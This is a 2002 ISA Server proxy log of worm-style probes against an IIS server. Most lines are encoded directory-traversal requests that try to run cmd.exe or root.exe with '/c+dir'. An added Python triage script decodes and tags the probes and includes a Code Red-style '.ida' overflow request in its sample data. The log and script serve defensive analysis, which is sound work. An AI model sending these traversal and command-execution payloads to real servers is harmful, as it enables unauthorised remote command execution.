-       -       GET     http://www/scripts/root.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.168.121.104 anonymous       -       N       2002-02-12      21:14:09        
W3ReverseProxy  SERVER99        -       www     -       -       10      70      
-       -       GET     http://www/MSADC/root.exe?/c+dir        -       -       
12202   0x0     Default rule    -
200.168.121.104 anonymous       -       N       2002-02-12      21:14:10        
W3ReverseProxy  SERVER99        -       www     -       -       10      80      
-       -       GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.168.121.104 anonymous       -       N       2002-02-12      21:14:10        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.168.121.104 anonymous       -       N       2002-02-12      21:14:11        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.168.121.104 anonymous       -       N       2002-02-12      21:14:11        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.168.121.104 anonymous       -       N       2002-02-12      21:14:12        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:25        
W3ReverseProxy  SERVER99        -       www     -       -       -       72      
-       -       GET     http://www/scripts/root.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:27        
W3ReverseProxy  SERVER99        -       www     -       -       -       70      
-       -       GET     http://www/MSADC/root.exe?/c+dir        -       -       
12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:30        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:32        
W3ReverseProxy  SERVER99        -       www     -       -       -       80      
-       -       GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       
-       12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:34        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:36        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:38        
W3ReverseProxy  SERVER99        -       www     -       -       -       117     
-       -       GET     
http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir 
-       -       12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:40        
W3ReverseProxy  SERVER99        -       www     -       -       -       145     
-       -       GET     
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
     -       -       12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:42        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:44        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:46        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:48        
W3ReverseProxy  SERVER99        -       www     -       -       -       97      
-       -       GET     
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir     -       -       
12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:50        
W3ReverseProxy  SERVER99        -       www     -       -       -       98      
-       -       GET     
http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir    -       -       
12005   0x0     -       -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:52        
W3ReverseProxy  SERVER99        -       www     -       -       10      96      
-       -       GET     
http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir      -       -       
12005   0x0     -       -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:54        
W3ReverseProxy  SERVER99        -       www     -       -       -       100     
-       -       GET     
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir  -       -       
12202   0x0     Default rule    -
200.39.223.248  anonymous       -       N       2002-02-12      21:16:56        
W3ReverseProxy  SERVER99        -       www     -       -       -       96      
-       -       GET     
http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir      -       -       
12202   0x0     Default rule    -
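One way to triage a log wrapped like the one above, added here as an example and not part of the original post or of ISA Server: it rejoins each wrapped record, peels percent-encoding layers from the request path, and tags the probe types visible in this log next to the sc-status each one received. The tag names, the `SAMPLE` records and the 192.0.2.x addresses are constructed for illustration.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed records in the log's wrapped layout (documentation IPs, short N run).
SAMPLE = """\
192.0.2.10  anonymous  -  N  2002-02-12  19:02:03
W3ReverseProxy  SERVER99  -  www  -  -  -  97  -  -  GET
http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
  -  -  12202  0x0  Default rule  -
192.0.2.10  anonymous  -  N  2002-02-12  19:02:08
W3ReverseProxy  SERVER99  -  www  -  -  -  98  -  -  GET
http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
  -  -  12005  0x0  -  -
192.0.2.30  anonymous  -  N  2002-02-12  19:18:06
W3ReverseProxy  SERVER99  -  www.worm.com  -  -  18517  4039  -  -  GET
http://www.worm.com/default.ida?""" + "N" * 60 + """%u9090=a
  -  -  12202  0x0  Default rule  -
"""

REC_START = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}\s")
URI = re.compile(r"\s(https?://\S+)")
STATUS = re.compile(r"\s(\d+)\s+0x[0-9a-fA-F]+\s")  # sc-status precedes s-cache-info

def classify(uri):
    # Peel percent-encoding layers from the path (the query string is left as is).
    path, layers = uri.split("?", 1)[0].lower().encode("latin-1"), 0
    while (nxt := unquote_to_bytes(path)) != path:
        path, layers = nxt, layers + 1
    hits = {
        "ida-overflow": re.search(r"\.ida\?(.)\1{50,}", uri, re.I),
        "double-encoding": layers >= 2,
        # 0xC0 and 0xC1 never occur in valid UTF-8; they only start overlong forms.
        "overlong-utf8": b"\xc0" in path or b"\xc1" in path,
        "traversal": b"../" in path or b"..\\" in path,
        "shell-exec": path.endswith((b"/cmd.exe", b"/root.exe")),
    }
    return sorted(tag for tag, hit in hits.items() if hit)

def triage(text):
    # Rejoin wrapped lines: a new record starts with a client IP.
    recs = []
    for line in text.splitlines():
        if REC_START.match(line) or not recs:
            recs.append("")
        recs[-1] += " " + line.strip()
    found = ((r.split()[0], STATUS.search(r), URI.search(r)) for r in recs)
    return [(ip, s.group(1), classify(u.group(1))) for ip, s, u in found if s and u]
```

Grouping the output of `triage()` by sc-status shows how the proxy answered each probe type; in the records above the only values are 12202 and 12005.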
